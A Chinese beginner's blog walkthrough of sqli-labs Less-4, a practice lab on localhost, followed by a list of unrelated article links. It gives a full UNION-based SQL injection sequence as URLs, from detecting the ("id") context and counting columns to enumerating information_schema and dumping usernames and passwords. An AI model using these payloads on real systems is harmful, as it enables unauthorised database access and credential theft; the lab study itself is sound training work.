sqli-labs-less-4圖文詳解，適合小白

Hello World --發表於2020-10-23

Less-4

less1-3以釋出，1-4題相關知識點在https://blog.csdn.net/qq_46432288/article/details/109226871中，點選檢視吧！！！
less-4與1-3方法基本一致，只是最開始的判斷注入點有一點差別。

判斷注入：

http://127.0.0.1/sqli-labs-master/Less-4/?id=1 顯示正常
在這裡插入圖片描述

http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’’ 顯示正常（兩個單引號）
http://127.0.0.1/sqli-labs-master/Less-4/?id=2" 顯示錯誤（一個雙引號），錯誤：’“2"”) LIMIT 0,1’，出現一個）
在這裡插入圖片描述

http://127.0.0.1/sqli-labs-master/Less-4/?id=2")–+ 顯示正常，判斷原資料輸入後應該為(“id”)
在這裡插入圖片描述

判斷欄位列數：

http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 10 --+
在這裡插入圖片描述
顯示Unknown column ‘10’ in ‘order clause’，說明欄位列數少於10，繼續縮小數值進行測試。
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 3 --+ 正常顯示，表明欄位列數為3

判斷可回顯位：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,3 --+
在這裡插入圖片描述

判斷當前資料庫：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,database() --+
在這裡插入圖片描述

判斷當前使用者：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,user() --+

檢視所有資料庫：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
在這裡插入圖片描述

檢視當前資料庫中的所有表：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
在這裡插入圖片描述

檢視users表中的欄位：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
在這裡插入圖片描述

輸出username：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(username) from security.users --+
在這裡插入圖片描述

輸出password:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(password) from security.users --+
在這裡插入圖片描述

將username和password連線並聯合輸出：

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users --+
在這裡插入圖片描述

Less-4結束

。。。未完待續

相關文章

python適合小白學嗎？
2021-09-11
Python
Java泛型詳解，史上最全圖文詳解！
2022-02-14
Java泛型
PopClip使用教程圖文詳解
2022-12-12
PyCharm的使用教程【圖文結合-詳細】
2021-12-02
PyCharm
Typora+圖床詳解（小白都能學得會）
2020-12-15
圖床
分頁機制圖文詳解
2018-03-11
DEVONthink詳解|哪些檔案最適合放進 DEVONthink？
2020-12-21
dev
CentOS 7安裝教程（圖文詳解）
2024-06-14
CentOS
圖文詳解23種設計模式
2021-12-29
設計模式
圖文並茂詳解 NAT 協議！
2022-02-23
協議
Jenkins安裝部署使用圖文詳解（非常詳細）
2021-12-23
Jenkins
[適合小白的Linu基礎入門教程一
2021-01-04
小朋友適合讀增廣賢文麼，增廣賢文適合多大的孩子看？
2020-11-29
EventBus 3.0+ 原始碼詳解（史上最詳細圖文講解）
2018-07-30
原始碼
Wgpu圖文詳解（03）緩衝區Buffer
2024-11-18
GPU
常用負載均衡詳解（圖文總結）
2024-03-14
負載
ZooKeeper最全詳解(萬字圖文總結)
2024-02-20
微服務最全詳解(圖文全面總結)
2024-02-07
微服務
LL圖文詳解mysql中with...as用法hux
2022-03-01
MySqlUX
cookie與session的區別（圖文詳解）
2020-12-23
CookieSession
事務隔離級別(圖文詳解)
2019-04-10
【分享】5個非常適合Python小白的開發工具!
2022-05-17
Python
非常適合小白入門的Python學習路線
2020-09-18
Python
自媒體選圖文還是視訊？哪個更適合新人？
2022-05-05
socket基礎詳解小白白
2020-10-30
mysql資料庫的安裝（圖文詳解）
2024-03-17
MySql資料庫
負載均衡最全詳解(圖文全面總結)
2024-02-08
負載
圖文詳解 HDFS 的工作機制及其原理
2022-05-19
Java單連結串列反轉圖文詳解
2021-04-02
Java
圖文詳解Java物件記憶體佈局
2021-04-03
Java物件記憶體
小白轉行，python、Java、c++選擇哪個合適？
2022-03-31
PythonJavaC++
小白適合學Python嗎怎麼加入Python開發行列
2019-08-09
Python
適合新手小白的UI學習路線完整版
2018-10-16
UI
520 頁機器學習筆記！圖文並茂可能更適合你
2019-10-25
機器學習筆記
【小白學AI】GBDT梯度提升詳解
2020-08-30
AI梯度
Wgpu圖文詳解（02）渲染管線與著色器
2024-11-07
GPU
分散式儲存最全詳解(圖文全面總結)
2024-02-21
分散式
iOS AppStore上架流程圖文詳解2021版 (上)
2023-02-10
iOSAPP流程圖